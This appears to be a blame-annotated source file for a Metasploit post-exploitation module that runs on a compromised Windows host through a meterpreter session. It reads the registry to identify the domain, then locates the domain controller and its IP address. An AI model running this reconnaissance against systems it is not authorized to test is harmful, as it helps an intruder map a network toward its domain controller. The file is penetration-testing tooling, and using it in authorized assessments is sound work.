2011-10-03 21:05:54 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-10-03 21:05:54 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2013-09-05 18:41:25 +00:00
|
|
|
include Msf::Post::Windows::Priv
|
2011-10-03 21:05:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Windows Gather Enumerate Domain",
|
|
|
|
'Description' => %q{
|
|
|
|
This module identifies the primary domain via the registry. The registry value used is:
|
|
|
|
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Platform' => ['win'],
|
|
|
|
'SessionTypes' => ['meterpreter'],
|
|
|
|
'Author' => ['Joshua Abraham <jabra[at]rapid7.com>']
|
|
|
|
))
|
|
|
|
end
|
2011-10-03 21:05:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def reg_getvaldata(key,valname)
|
|
|
|
value = nil
|
|
|
|
begin
|
|
|
|
root_key, base_key = client.sys.registry.splitkey(key)
|
|
|
|
open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)
|
|
|
|
v = open_key.query_value(valname)
|
|
|
|
value = v.data
|
|
|
|
open_key.close
|
|
|
|
rescue
|
|
|
|
end
|
|
|
|
return value
|
|
|
|
end
|
2011-10-03 21:05:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def get_domain()
|
|
|
|
domain = nil
|
|
|
|
begin
|
|
|
|
subkey = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History"
|
|
|
|
v_name = "DCName"
|
|
|
|
domain = reg_getvaldata(subkey, v_name)
|
|
|
|
rescue
|
|
|
|
print_error("This host is not part of a domain.")
|
|
|
|
end
|
|
|
|
return domain
|
|
|
|
end
|
2011-10-03 21:05:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def gethost(hostname)
|
|
|
|
hostip = nil
|
|
|
|
if client.platform =~ /^x64/
|
|
|
|
size = 64
|
|
|
|
addrinfoinmem = 32
|
|
|
|
else
|
|
|
|
size = 32
|
|
|
|
addrinfoinmem = 24
|
|
|
|
end
|
2011-10-12 23:15:07 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
## get IP for host
|
|
|
|
begin
|
|
|
|
vprint_status("Looking up IP for #{hostname}")
|
|
|
|
result = client.railgun.ws2_32.getaddrinfo(hostname, nil, nil, 4 )
|
|
|
|
if result['GetLastError'] == 11001
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
addrinfo = client.railgun.memread( result['ppResult'], size )
|
|
|
|
ai_addr_pointer = addrinfo[addrinfoinmem,4].unpack('L').first
|
|
|
|
sockaddr = client.railgun.memread( ai_addr_pointer, size/2 )
|
|
|
|
ip = sockaddr[4,4].unpack('N').first
|
|
|
|
hostip = Rex::Socket.addr_itoa(ip)
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_error(e)
|
|
|
|
end
|
|
|
|
return hostip
|
|
|
|
end
|
2011-10-03 21:05:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
domain = get_domain()
|
|
|
|
if not domain.nil? and domain =~ /\./
|
|
|
|
dom_info = domain.split('.')
|
|
|
|
dom_info[0].sub!(/\\\\/,'')
|
|
|
|
report_note(
|
|
|
|
:host => session,
|
|
|
|
:type => 'windows.domain',
|
|
|
|
:data => { :domain => dom_info[1] },
|
|
|
|
:update => :unique_data
|
|
|
|
)
|
|
|
|
print_good("FOUND Domain: #{dom_info[1]}")
|
|
|
|
dc_ip = gethost(dom_info[0])
|
|
|
|
if not dc_ip.nil?
|
|
|
|
print_good("FOUND Domain Controller: #{dom_info[0]} (IP: #{dc_ip})")
|
|
|
|
report_host({
|
|
|
|
:host => dc_ip,
|
|
|
|
:name => dom_info[0],
|
|
|
|
:info => "Domain controller for #{dom_info[1]}"
|
|
|
|
})
|
|
|
|
else
|
|
|
|
print_good("FOUND Domain Controller: #{dom_info[0]}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2011-10-03 21:05:54 +00:00
|
|
|
end
|